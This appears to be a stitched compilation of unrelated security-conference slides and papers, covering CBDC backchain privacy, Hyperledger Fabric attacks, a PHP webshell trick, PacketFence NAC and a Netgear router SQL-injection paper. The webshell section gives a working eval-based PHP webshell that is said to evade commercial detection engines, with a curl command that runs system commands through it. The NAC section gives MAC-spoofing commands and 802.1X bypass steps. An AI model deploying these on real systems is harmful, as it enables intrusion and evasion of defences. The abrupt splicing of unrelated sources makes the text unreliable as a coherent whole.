"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
97
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
98
Practical example: Get the transactions
The admin of PSP2 has now extracted and created a JSON list of all transactions in all backchains for all
tokens on the PSP2 Corda node.
{
"edges": [
{
"source": {"id": "PSP:GfHq2tTVk9z4eXgyKAMEqYfMYACZy4RQAuN3p72MxBywj86qJnnk3EhzaNPr", "label":
"PSP:GfHq2tTVk9z4eXgyKAMEqYfMYACZy4RQAuN3p72MxBywj86qJnnk3EhzaNPr"},
"target": {"id":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4", "label":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4"},
"value": "1337.30"
},
{
"source": {"id":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4", "label":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4"},
"target": {"id":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTJX1eBDU2mve7qqDWbmoVu9HDG1pstQnSss4TsEC68tDuWKSRZ9hNJDrmcfkxZ4agpD7qM2UsvAGcPWwbG3qdAuts", "label":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTJX1eBDU2mve7qqDWbmoVu9HDG1pstQnSss4TsEC68tDuWKSRZ9hNJDrmcfkxZ4agpD7qM2UsvAGcPWwbG3qdAuts"},
"value": "1337.40"
}]
}
99
Practical example: Datamine
The admin of PSP2 only has the public keys of the users in the backchain, but can enrich the information
with wallet IDs or aliases using information in the logs or the user transaction log in the PSP2
business layer. For this to work, some user on PSP2 must have done a transaction with
that public key earlier.
User history record extract from PSP2 business layer.
TxID
0DDB759E02091B3A52D61194AE7D464F7022DBF3DBAF45005B74F27F0E49A0B7
Command
PAY
Payer wallet ID
9021f73d-d883-4cfb-8899-203690bff93f
Payer PSP
PSP1
Payee wallet ID
cf960d62-b1a6-4816-8179-717808d160d8
Payee PSP
PSP2
Amount
5.00
100
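As a sketch, that join can be done in a few lines of JavaScript. The function, the field names and
the assumption that some business-layer log ties a public key to a wallet ID are all illustrative,
not the prototype's actual code:

// Enrich backchain edges with wallet IDs from PSP2's own records.
// walletByKey maps a public key to a wallet ID (the source of that mapping
// is assumed: the logs or the user transaction log mentioned above).
function enrichEdges(edges, walletByKey) {
  edges.forEach(function (edge) {
    // fall back to the raw public key when PSP2 never saw it in a payment
    edge.source.label = walletByKey[edge.source.id] || edge.source.id;
    edge.target.label = walletByKey[edge.target.id] || edge.target.id;
  });
  return edges;
}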
Practical example: Visualize
Just pour the enriched JSON transaction list into HTML with D3.js (https://d3js.org/) function
d3.layout.force() to connect all the transactions.
<script>
// load the enriched transaction list produced in the datamine step
d3.json("back2.json", function(error, data) {
...
// force-directed layout: linked transactions pull together on screen
var force = d3.layout.force();
...
graph = new myGraph();
graph.initialize();
});
</script>
101
Visualization with data only from PSP2
102
Backchain and privacy
Need to be compliant with:
• European General Data Protection Regulation (GDPR)
• Swedish bank secrecy regulation
103
Everything else
Everything that must be solved before going into production with a token-based retail CBDC
• Performance and authenticity of the digital currency.
• High availability and in memory token selection.
• Catastrophic failures and disaster recovery.
• A secure offline?
• Non-repudiation.
• Information security (ISO 27000)
• IT security (NIST, OWASP)
• Laws, regulations and financial compliance
104
Solutions
There are many solutions for the presented challenges.
• Chain snipping, Chipping, Key rotation, Zero knowledge proof and other encryption.
• Validating notary node.
• Hardware wallets (e.g. smart cards).
• Restore procedures and functions for correcting inconsistencies.
The Riksbank is now experimenting with other designs and will also look at other
technologies.
105
Summary
The goal of this presentation is to share insights into the security challenges of building a
prototype of a two-tier retail central bank digital currency based on a blockchain with value-
based tokens.
We only presented threats, vulnerabilities, security fails and some unknowns.
We did not present the good design and all the positive lessons learned!
106
Thank you for
attending
107
Tineola: Taking A Bite Out of Enterprise Blockchain
Attacking HyperLedger Fabric
Parsia Hakimian, Stark Riedesel
Defcon 26 – Aug 11, 2018
2
5 Courses
Our Team
Enterprise Blockchains
A Use Case
The Target – HyperLedger Fabric
Tineola
3
HyperLedger Fabric – Core Research Group
Parsia Hakimian
Senior Consultant
Stark Riedesel
Senior Consultant
Travis Biehn
Emerging Tech Lead
Koen Buyens
Principal Consultant
4
Enterprise Blockchain Terroir
Enterprise Blockchain
Enthusiasts
Tech
Auto & Aero
Financial Services
Accounting
Healthcare
Logistics
Oil
Enterprise Platforms
Public Platforms
5
Platform Desires Meet Reality
Promise
Immutability
Auditability
Tune-able Trust
Programmable
Challenge
Immutability
Mutability
Privacy
Correctness and Speed
Execution Environment
Platform Complexity
6
On The Chopping Block
Enterprise Blockchain
Enthusiasts
Tech
Auto & Aero
Financial Services
Accounting
Healthcare
Logistics
Oil
Enterprise Platforms
Public Platforms
7
Build Blockchain Insurance App
Our Enterprise Application Strawman
8
Build Blockchain Insurance App
9
Build Blockchain Insurance App
10
Meet HyperLedger Fabric
An Interesting New Machine
11
Chaincode: Fabrics’ Smart Contracts
12
Security Model
13
HyperLedger Machine
14
HyperLedger Machine – Proposal
15
HyperLedger Machine – Concrete Execution
16
HyperLedger Machine – Endorsement
17
HyperLedger Machine – State Transition
18
HyperLedger Machine – New Global State
19
HyperLedger Machine – Suspect
Non BFT
Optional BFT
Caching
20
Tineola
“A Tool to Interface With HyperLedger Fabric”
21
Appetizers
22
Enumeration
23
Invoking Chaincode
24
Fuzzing
25
Simple Injection
26
Entrée
27
Pivoting
28
Direct DB Manipulation – Hierarchy Abuse
29
Pre-Commit Side Effects: Problems
30
Get Your Own Taste
Follow and PR: https://github.com/tineola/tineola
Thank You
Preface

Continuing to share some small Webshell tricks. Before the main text starts, here are two
questions. Don't read ahead in the pdf yet, and don't run the code: judge by eye alone what the
following two php snippets output. The underlying principle and its use in Webshells are
written up in this PDF.

Code 1:

<?php
$a=array("a","b");
$b=&$a[0];
$c=$a;
$c[0]="c";
$c[1]="d";
var_dump($a); //output: ?
?>

Code 2:

<?php
function theFunction($array) {
$array[0] = 2;
}
$array = array(1,2);
$reference =&$array[0];
theFunction($array);
var_dump($array); //output: ?
?>

Main text

No need for me to reveal the answers here; running the snippets makes them obvious. Both
snippets above come from php bugs, and I believe the vast majority of people who have never
run into this issue are likely to judge them wrong.

Someone who judges wrong probably reasons as follows:

Question 1: In code 1, the variable $a is only value-copied into $c, with no pass-by-reference,
so why does $c[0]="c" still change $a[0]?

Question 2: In code 2, the parameter of theFunction is not passed by reference, so why does
the function body still change the value of the global variable $array?

This issue was in fact raised by developers more than 20 years ago
(https://bugs.php.net/bug.php?id=6417), and over the following years developers kept
bringing it up in php-bug reports and in notes in the manual:

https://bugs.php.net/bug.php?id=6417
https://bugs.php.net/bug.php?id=7412
https://bugs.php.net/bug.php?id=15025
https://bugs.php.net/bug.php?id=20993
https://www.php.net/manual/zh/language.references.php
The "problem" still exists as of php8. It has not been fixed because the PHP team does not
consider it a bug, and their explanation is:

Due to the peculiarities of PHP's internals, if you take a reference to a single element of an
array and then copy the array, whether by assignment or by value in a function call, the
reference is copied as part of the array. This means that changes to any such element in either
array are duplicated in the other array (and in the other references), even if the arrays have
different scopes (e.g. one is a parameter inside a function and the other is global)! Elements
that held no reference at copy time, and references assigned to other elements after the array
was copied, work normally (i.e. independently of the other array).

To verify the claim above, we can inspect variables a and c with xdebug_debug_zval: both
$a[0] and $c[0] are flagged as is_ref, which means they are reference types.

To be more rigorous, we can also attach gdb to PHP: in gdb, $a[0] and $c[0] are likewise
flagged is_ref and both point to the same memory address, which verifies why modifying
c[0] also changes a[0].
Application in Webshells

Since we now know PHP has this little "trick" in array references, can it be used in a Webshell?
The answer is yes.

The sample below is a bypass I submitted in the Aliyun (Alibaba Cloud) contest; I later tested
the Chaitin CloudWalker and Baidu engines as well, and it bypassed both of them.
<?php
$a=array(1 => "A");
$b=&$a[1];
$c=$a;
$c[$_GET["mem"]]=$_GET["cmd"];
eval($a[1]);
?>
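For instance, assuming the sample above is saved as shell.php on a target, it can be driven like
this (the URL is illustrative; --data-urlencode keeps the PHP payload intact):

curl -G "http://target.example/shell.php" \
     --data-urlencode "mem=1" \
     --data-urlencode "cmd=system('id');"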
If a Webshell engine's developers have not adapted to this "problem", the engine will lose the
relevant taint in its subsequent taint tracking: judging from the abstract syntax tree parsed out
of the PHP code, the variable $c only receives a value copy of $a, so the engine naturally never
marks $c as tainted.
下面的代码又会输出什么呢?
https://bugs.php.net/bug.php?id=29992
参考
https://www.php.net/manual/zh/language.references.php
https://cloud.tencent.com/developer/article/1621153
https://bugs.php.net/bug.php?id=6417
https://bugs.php.net/bug.php?id=7412
https://bugs.php.net/bug.php?id=15025
https://bugs.php.net/bug.php?id=20993
https://bugs.php.net/bug.php?id=29992
<?php
$array = array(1,2,3);
foreach( $array as &$item ) { }
print_r( $array );
foreach( $array as $item ) { }
print_r( $array );
?> | pdf |
PacketFence, the Open Source NAC:
What we've done in the last two years
Salivating on NAC secret sauce
Presentation Plan
What's Network Access Control (NAC)
The secret sauce
The Open Source differentiator
The good and the bad of 2 years as lead developer
The Future of PacketFence (aka World Domination Roadmap)
Community bonding!
Who I am
Olivier Bilodeau
System architect working at Inverse inc
PacketFence lead developer since 2009
Teaching InfoSec to undergraduate in Montreal
...
new father, Open Source nuts, enjoying CTFs a lot, android developer, brewing beer
Social stuff
twitter: @packetfence / identi.ca: @plaxx
delicious: plaxxx / linkedin: olivier.bilodeau
What's Network Access Control (NAC)
NAC elevator pitch
NAC: Network Access (or Admission) Control
Authentication
Map usernames to IP addresses (or MAC addresses)
Admission
Allow, partially allow or deny users or devices
Control
Watch for unauthorized stuff
Including: Outdated AV, patch-level, scanning corporate servers, spreading
malware, ...
Know who is using your network and making sure they behave
What NAC has become
Remediation of users
Crush helpdesk costs by giving users their own path to fix their problems
Guest management
Asset/Inventory management
Simplified access layer configuration
Reduce network mgmt costs by centralizing decisions on a srv
The secret sauce
The technology
Mostly Perl some PHP
Leveraging open source*
Designed with high-availability in mind
active-passive clustering
Key design decisions
Out of band*
Edge enforcement*
No Agent
Web-based captive portal
Listen to everything
Out of band
At first, relying on SNMP Traps*
next slide is about that
LinkUp / LinkDown events
MAC Nofication events
Port-Security (SecurityViolation) events
Then RADIUS-based techniques emerged
Wireless MAC-Authentication*
Wireless 802.1X*
followed by Wired MAC-Auth and 802.1X
Edge enforcement: SNMP Traps based
Events on network hardware generates Traps
PacketFence reacts on the traps
Uses SNMP to authorize the MAC / change the VLAN
or telnet / ssh if the vendor sucks
port-sec traps have MACs in them so are best otherwise we need to poll
port-sec fail last-known state
Protocol Reminders
RADIUS
key-value based protocol for AAA
"infrastructure" protocol
Protocol Reminders (contd.)
802.1X
Extensible Authentication Protocol (EAP)
over RADIUS
Actors
Supplicant
client side software integrated in Win, Linux,
OSX now
Authenticator
aka NAS
Authentication Server
NAS is switch / controller, auth srv: FreeRADIUS on PF Server
explain typical dialog: client speaks to switch/controller with EAPoL (pre-access)
the switch turns around and speaks RADIUS with the server
server reacts and send instructions to switch
end-to-end encrypted EAP tunnel is established
several EAP flavors; things have mostly settled on PEAP/EAP-MsCHAPv2
switch doesn't have to understand EAP
Allows to securely share stuff with client (WPA-Enterprise keys)
Protocol Reminders (contd.)
MAC-Authentication
Simple RADIUS auth with MAC as User-Name
Concept similar to 802.1X
infra talks with srv, srv sends instructions
No strong authentication
trust based on MAC seen on the wire
No end-to-end with client
client doesn't need to "support it"
not sure what came up first but it feels like a backport of 802.1X
RADIUS CoA (RFC3576)
Server-initiated
Edge enforcement: RADIUS based
Access-Accept most request
Return proper VLAN attribute based on client status
FreeRADIUS does RADIUS / 802.1X pieces
full auth incl. NTLM (AD) through samba
FreeRADIUS perl extension calls a PacketFence Web Server
Decision and VLAN returned at this point
H-A is critical as RADIUS is now a SPOF
The Captive Portal
It provides
Various authentication mechanism (LDAP, AD, RADIUS, Kerberos, Guests, ...)
Redirection to the Internet after authentication
Remediation information to users on isolated devices
The Captive Portal (contd.)
In order to reach the captive portal
Provide DHCP
IP to MAC (but we do arp also)
DNS Blackhole
In Registration / Isolation VLAN we are the DNS Server
No matter the request, we return PacketFence's IP
SSL Redirection
Requested URL is re-written to
http://www.google.com => https://pf.initech.com/captive-portal
WISPr support
Voice over IP
SNMP-based
Old way: Rely on CDP / Voice VLAN features
and allow dynamically learned MAC on Voice VLAN
That's right! No secret here, that's weak!
New way: handle them as regular devices
RADIUS-based
MAC-Auth
The switch is more important than your device
802.1X
Some VSA's to control behavior
Very few support 802.1X
Not widespread
Voice over IP (contd.)
Note to pentesters:
Most want auto-registration of phones
Accomplished through:
MAC Vendor prefix
CDP
DHCP fingerprints
802.1X MD5 Auth
Spoof: allowed on the Voice VLAN
if not worse
sometimes Voice VLAN IDs are pushed down in DHCP Options!
Quarantine
On a separate VLAN providing
strong isolation
Triggers:
Operating System (based on DHCP
fingerprints)
I talked about those yesterday
(FingerBank talk)
Browsers (User-Agent string)
MAC Vendor
Nessus plugin ID (failed scan)*
IDS rule triggered*
Captive portal provides instructions
Remediation!
Policy checking and Monitoring
Nessus
Client-side scanning upon authentication
Somewhat limited
little use w/o domain credentials (scan open ports?)
not free
the more tests the slower
Snort IDS
Span your traffic to PacketFence server
available remote also
Enable some Snort rules
Devices violating the rules will be isolated
Network Hardware support
RADIUS-based is easiest
SNMP is challenging
Few standards (nothing regarding port-security)
Most implementation differ (even for the same vendor)
Nasty bugs*
PacketFence ZEN
ZEN: Zero Effort NAC
VMware Virtual Appliance
Pre-installed
Pre-configured
Open Source FTW!!
The open source advantage
Vendor independence
means we support more hardware brands
and today's networks are heterogeneous. Also no vendor locking
Proprietary pricing questionable
(per IP, per concurrent connections, per AP/Switch...)
We stay focused and build on top of
Usual daemons: Apache, Bind, dhcpd
Network services: Net-SNMP, FreeRADIUS
Security: snort, iptables
70+ Perl CPAN modules
Linux!
familiar stack
The technology is exposed: users know more and there's less reliance on vendors or
contractors
Security is necessarily not solely based on obscurity
Defeated proprietary NAC by hardcoding sniffed IP/gateway or pinning ARP
2 years as lead developer
The learning, the bad and the good.
IP Address spoofing
MAC Address spoofing
DHCP client spoofing
Use dhclient with a config file to spoof VoIP or infrastructure devices and gain access (see the sketch after this list). Could work against PacketFence depending on config. A well hidden secret though!
work w/ PacketFence based on config. Well hidden secret though!
User-Agent spoofing
Spoof a mobile browser, bypass requirement for client Agent. That's how some of the
Learned: Most NACs are easy to
bypass
To achieve user friendliness or network administrator friendliness one often drops security
Per port exceptions (printers, voip, uplinks, etc.): Find them, leverage them
CDP enabled: Fake being an IP Phone or an infrastructure device
Real DNS exposed: DNS-tunnel out
Because there is no authentication built-in L2 / L3
big boys do it..
Learned: Wired 802.1X bypass
802.1X == Port-Based Network Access Control
1. Put a hub between victim and switch (prevent port from going down)
2. Wait for victim to successfully authenticate
3. Spoof your MAC with victim's MAC
4. Plug into the hub
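On Linux, step 3 is three commands (interface name and MAC are illustrative):

# Clone the victim's MAC before plugging into the hub
ip link set dev eth0 down
ip link set dev eth0 address 00:11:22:33:44:55
ip link set dev eth0 up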
Learned: Wired 802.1X bypass
Attack scenarios
1. We keep legitimate client connected
Bad: Duplicated MACs on the same segment
Good: Original client could re-authenticate if switch asks
2. Replace legitimate client
Bad: We won't pass a re-authentication request
Good: No network problems (no duplicated MAC on the segment)
Try it out. It works!
Learned: getting into 802.1X is tricky
business
Supplicant support
Win: Need to launch a service
OS EAP support varies
Proprietary supplicant quality / features varies
Some hardware begins to impement it
Forget about most of them
Too many things does IP: UPS, slingbox, barcode scanner
Outside the spec
Should a supplicant do DHCP REQUEST or DISCOVER after a new authentication?
How should a switch handle multiple supplicant per port?
Important for VoIP, Virtualization, etc.
Unified MAC-Auth + 802.1X configuration tricky
Timing issues on reboot (dot1x times out, MAC-Auth kicks in)
Learned: Wired 802.1X on Mac OSX is
buggy
After 802.1X re-authentication and a VLAN change (through RADIUS VLAN Attributes)
OSX does unicast DHCP REQUEST to its previous DHCP Server (instead of
DISCOVER)
Does 3 attempts with 1 minute delays between them
Then resort to a broadcasted DHCP DISCOVER
A "correct" implementation does
3 unicast DHCP REQUESTS in a row
Waits 2-3 seconds for replies
Then resort to a broadcasted DHCP DISCOVER
Noteworthy
They had the same issue on wireless but they fixed it in 10.6.5
We filed a bug report, provided requested information and haven't heard back since
Learned: Network vendor
fragmentation
VLAN assignment through SNMP
Port-Security
Named differently
Implemented differently (per VLAN, per port, per port-VLAN)
SNMP access inconsistent
RADIUS-based enforcement
Wired MAC-Authentication has many many names
MAC-Auth Bypass aka MAB (Cisco)
MAC-based authentication (HP)
NEAP (Nortel)
Netlogin (Extreme Networks)
MAC RADIUS (Juniper))
802.1X's grey areas are all implemented differently
RADIUS Change of Authorization (RFC3576) not so supported...
Newer stacks favor Web Services and only provide read-only SNMP
Fortunately the situation on the wireless side is better
Learned: Network vendors firmwares
quality
Regressions...
Weird coincidence? Same bugs implemented by different vendors
PacketFence: I think there's a bug here. Vendor: oh, right! it doesn't work using CLI
but it does work with the Web GUI
Scale issues
some implement the security table in MAC table. makes everything slower on large L2
VLANs
Learned/rant: Network vendor
closeness
I know some people aren't going to agree with this but...
All vendors hold tight on their issue trackers
Most vendors hold tight on their firmware
Some vendors hold tight on their documentation
Learned: Almost nobody does
infrastructure authentication
Asking a user to install/select a CA to authenticate the infrastructure is too much
Asking the admins to push a GPO with the proper configuration is too much
Isn't WPA2/Enterprise enough they say?
All the infrastructure to teach the user how to configure themselves can be sent over an
open SSID in HTTPS but even then they just don't care! They want youtube, now!
The bad
First installation step: Disable SELinux
Too short release cycles for a 'core infrastructure' piece of software
No nmap integration :(
External code contributors are scarce
Pretty much CentOS/RHEL only
The good: Development Process /
Infrastructure
Fully automated smoke tests
Automated nightly packages promoted to the website (snapshots)
Stable branches (2.2, trunk) vs feature branches
All the work is directly public. No internal magic or big code dumps.
The good: Usability++
Re-organized and simplified documentation
Simplified installation
Simplified upgrades
Default VLAN management technique covers a lot of use cases
The good: Enterprise++
Web Administration users rights
Out of the box support for routed environments
64 bit support
Fancy guest workflow support
Email activation
Hotel-style Access codes
Remote pre-registration
Approval by a sponsor
SMS authentication
...
The good: Performance++
1.8.5: ~10x MAC-Auth / 802.1X performance gain
1.9.0: Avoiding object re-creation and spawning shell commands (impact not
measured)
1.9.1: 23x faster captive portal
2.2.0: Automatic Apache number of child tweaking based on system memory
2.2.1: Reduced by 550% RADIUS round-trip time on environment with lots of network
devices
The good: Technology++
Web Services support for network hardware management
New architecture for RADIUS-based access using Web Services
Strongly decouples RADIUS from PacketFence infra
Allows tiered deployment: many local "dumb" FreeRADIUS boxes with a central PacketFence
server
Multi-site local RADIUS with caching in case of WAN failure
Demoed a PacketFence in the cloud on Amazon EC2 (Remote RADIUS, local
OpenVPN)
Making in-line and out-of-band work at the same time on the same server
Cool hacks: Proxy Bypass
Bypassing client-side proxy settings
The problem
Browser tries to reach the proxy
Proxy doesn't exist in registration / isolation VLANs
We rely on the browser to present information to the user
We rely on user IP to identify him
Worse, SSL through a proxy is done with a CONNECT end-to-end tunnel
The solution
A Squid proxy
Squid's URL Redirectors make sure that all hits are redirected to the captive portal
Squid's SSL Bump will terminate CONNECT requests
No SSL errors since we bump using the real captive portal cert
and everything is still encrypted up to the PacketFence server
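A minimal squid.conf sketch of those two tricks (paths and the rewrite helper script are
assumptions, and ssl_bump syntax varies across Squid versions; url_rewrite_program and
ssl_bump are real Squid directives):

# Terminate CONNECT tunnels with the captive portal's own certificate,
# so HTTPS clients get no certificate warning
http_port 3128 ssl-bump cert=/usr/local/pf/conf/ssl/server.crt key=/usr/local/pf/conf/ssl/server.key
ssl_bump allow all

# Rewrite every hit to the captive portal (helper script is hypothetical)
url_rewrite_program /usr/local/pf/addons/portal_redirect.pl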
Cool hacks: Javascript network access
detection
The problem:
The delay before network access is enabled is unpredictable (OS, switch, browser, ...)
Avoid a fixed value, otherwise everyone waits for the slowest case
Browsers don't like changing IPs / DNS and still run javascript code
The solution:
Turn off DNS prefetching (with HTTP Header)
Hidden <img> tag with an onload callback
Periodically inject a src that points to an image hosted on a 'registered' VLAN
Once the image successfully load, the callback is called and we redirect the user to its original
destination
Our World Domination Roadmap
Short-term
In-line mode to ease support of legacy network hardware (now in beta!)
reduced complexity
RADIUS Accounting / Bandwidth monitoring
NAP / Statement of Health client-side checks
RADIUS CoA (RFC3576)
ACL / QoS assignment with RADIUS
VPN support
Debian / Ubuntu support
Long-term
Active-Active clustering support
nmap / OpenVAS integration
Making this stuff "Click Next-Next-Next" easy to install
Rewrite the Web Administration interface
would get rid of the php
Research topics
IF-MAP support
Open source multi-platform client-side agent
Trusted Computing Group's Trusted Network Connect (TNC)
Community bonding!
This is where we beg for help..
Network hardware vendors
Contact us we want to support your hardware!
Security software vendors
We want to integrate with your IDS, Netflow analyzer, IPS, Web filter, etc. but we need
licenses...
Developers
Low barrier to entry: It's all Perl!
Audit our [web] code. We know there are issues. Help us find and fix them!
Become users!
We would love to see more businesses/consultants deploying PacketFence for their
customers on their own!
That's it
I hope you enjoyed! See you in the debriefing room.
twitter: @packetfence / identi.ca: @plaxx
delicious: plaxxx / linkedin: olivier.bilodeau
References
PacketFence
Project Website, http://www.packetfence.org
Source Code Repository, http://mtn.inverse.ca
Issue tracker, http://www.packetfence.org/bugs
802.1X
Wikipedia: 802.1X, http://en.wikipedia.org/wiki/IEEE_802.1X
An Initial Security Analysis of the IEEE 802.1X Standard, http://www.cs.umd.edu/~waa/1x.pdf
Mitigating the Threats of Rogue Machines — 802.1X or IPsec?,
http://technet.microsoft.com/en-ca/library/cc512611.aspx
Research
Cisco NAC: No Agent for iOS,
http://www.cisco.com/en/US/docs/security/nac/appliance/support_guide/agntsprt.html#wp125743
Proxy Bypass
Feature ticket, http://www.packetfence.org/bugs/view.php?id=1035
Squid's SSL Bump, http://www.squid-cache.org/Doc/config/ssl_bump/
Squid's Redirectors, http://wiki.squid-cache.org/Features/Redirectors
Important projects
FreeRADIUS, http://freeradius.org/
Net-SNMP, http://www.net-snmp.org/
The others you already know about
Tools
yersinia: Comprehensive LAN attack tool, http://www.yersinia.net/
iodine: IP over DNS tunneling, http://code.kryo.se/iodine/
Teal Rogers and Alejandro Caceres
• Teal has experience with 3D
visualizations and organizing massive
amounts of data.
• Alex has a background in distributed
computing, network reconnaissance,
and vulnerability detection.
• The internet contains a massive amount of data that is extremely interconnected; however, we lack any good solutions for visualizing these connections. Classical approaches to showing that much data just don't work. You either have to eliminate too much data or else allow everything to become too confusing.
• This is where 3D comes in. By organizing our data in 3D we
finally have a platform for displaying the invisible structure of
the web. Now that we finally have a way to structure the web
visually and intuitively, we can start adding data to that picture.
For instance by allowing everyone (everyone who uses our
software at least) to see just how many sites are riddled with
security vulnerabilities.
• I have been analyzing the security of sites on the internet
for some time now. Most websites on the Internet are a
complete mess. My PunkSPIDER project discovered this
when I unleashed my distributed fuzzer on the entire
Internet and started cataloging the results.
• The first thing we needed to do was what Google already did so
well -- collect links on the Internet and keep our index up to date.
One of our requirements was that this metadata include extensive
information on the vulnerabilities of a website. In order to find this,
we are performing thorough, but minimally invasive, application-
level vulnerability scanning against every site we crawl.
• We are leveraging the open-source and free Apache Nutch project
along with some custom built Nutch plugins to help us out with
this. Nutch is an extremely powerful Hadoop cluster-based
distributed web spider.
• We built a custom, distributed web application fuzzer to find
vulnerabilities as fast as we can spider. By using Alex’s experience
in building high-speed, distributed web app fuzzers (see
PunkSPIDER) we were able to build a custom one for this project
relatively quickly. Application vulnerability detection is an integral
part of the back-end workflow of this project and is in fact, built
directly into our web spidering efforts.
• The back-end’s goal is to make website security data an integral
part of high speed crawling, therefore allowing us to make this an
integral part of the visual metadata in the 3D engine.
• All of the structures you see here are organic. Pages repel each
other, links between pages pull them closer together, and every page
floats to its own level based on how many hops it is from the home
page. Using these basic physical principles, each site creates its own
unique structure based on how its links are structured.
• This is just the beginning, we have a lot more to add to
our view of web 3.0, and we want your help. If you’re
interested, come to trinarysoftware.com or
hyperiongray.com, try the software for yourself, and add
yourself to the mailing list. We will be giving away free
beta access to everyone on the mailing list in a few
weeks, and we want your input on where you would like
to see web 3.0 go from here.
• If you want to hear more about Alex’s distributed network
reconnaissance and attack tools, he is giving a speech
about them in track 1 at 3:00 today.
Abstract

This paper details an approach by which SQL injection is used to gain remote access to arbitrary files from the file systems of Netgear wireless routers. It also leverages the same SQL injection to exploit a buffer overflow in the Netgear routers, yielding remote, root-level access. It guides the reader from start to finish through the vulnerability discovery and exploitation process. In the course of describing several vulnerabilities, this paper presents effective investigation and exploitation techniques of interest to those analyzing SOHO routers and other embedded devices.
SQL Injection to MIPS Overflows: Rooting SOHO Routers
Zachary Cutlip, Tactical Network Solutions
[email protected]
Introduction

In this paper I will demonstrate novel uses of SQL injection as an attack vector to exploit otherwise unexposed vulnerabilities. Additionally, I detail a number of zero-day remote vulnerabilities found in several popular Small Office/Home Office (SOHO) wireless routers manufactured by Netgear. In the course of explaining the vulnerabilities, I demonstrate how to pivot off of a SQL injection in order to achieve fully privileged remote system access via a buffer overflow attack. I also make the case that the oft-forgotten SOHO router is among the most valuable targets on a home or corporate network.

Traditionally, SQL injection attacks are regarded as a means of obtaining privileged access to data that would otherwise be inaccessible. An attack against a database that contains no valuable or sensitive data is easy to disregard. This is especially true in the case that the data is temporary and application-generated. I will show that such vulnerabilities may actually present new exploitation opportunities. Often, an application developer assumes that only his or her application will ever make modifications to the database in question. As a result, the application may fail to properly validate results from database queries, since it is assumed that all query results may be trusted. If the database is vulnerable to tampering, it is then possible to violate the application developer's assumption of well-formed data, sometimes to interesting effect.

I will demonstrate three vulnerabilities in the target device. First is a SQL injection vulnerability that is trivially exploitable, but yields little in the way of privileged access. The second and third vulnerabilities yield successively greater access, but are less exposed. I will show how we can use the first as an attack vector in order to effectively exploit the second and third vulnerabilities.
The goals for this paper are:

• Introduce a novel application of SQL injection in order to exploit a buffer overflow and gain remote access.
• Describe zero-day vulnerabilities found in Netgear SOHO routers.
• Guide the reader step-by-step through the investigative process, so that he or she may produce the same results independently.
• Provide the reader with a set of useful investigative techniques applicable to SOHO routers and embedded devices in general.
Target Device: Netgear WNDR3700v3

In order to demonstrate real world cases in which application vulnerabilities may be exploited by first compromising the integrity of a low-value database, I will demonstrate security analysis of a popular wireless router. The device in question is the Netgear wireless router WNDR3700 version 3.[1] The WNDR3700's robust feature set makes it very popular. It is this enhanced capability set that also makes it an attractive subject of security analysis. Specifically, it is this device's media storage and serving capability that is the subject of this paper's research.

In addition to traditional wireless networking and Internet gateway capability, the WNDR3700 functions as a DLNA server. DLNA stands for Digital Living Network Alliance and refers to a set of specifications that define, among other things, mechanisms by which music and movie files may be served over a local network and played back by DLNA-capable devices. As I will show, this device's DLNA functionality exposes critical vulnerabilities.
SOHO Router as High Value Target

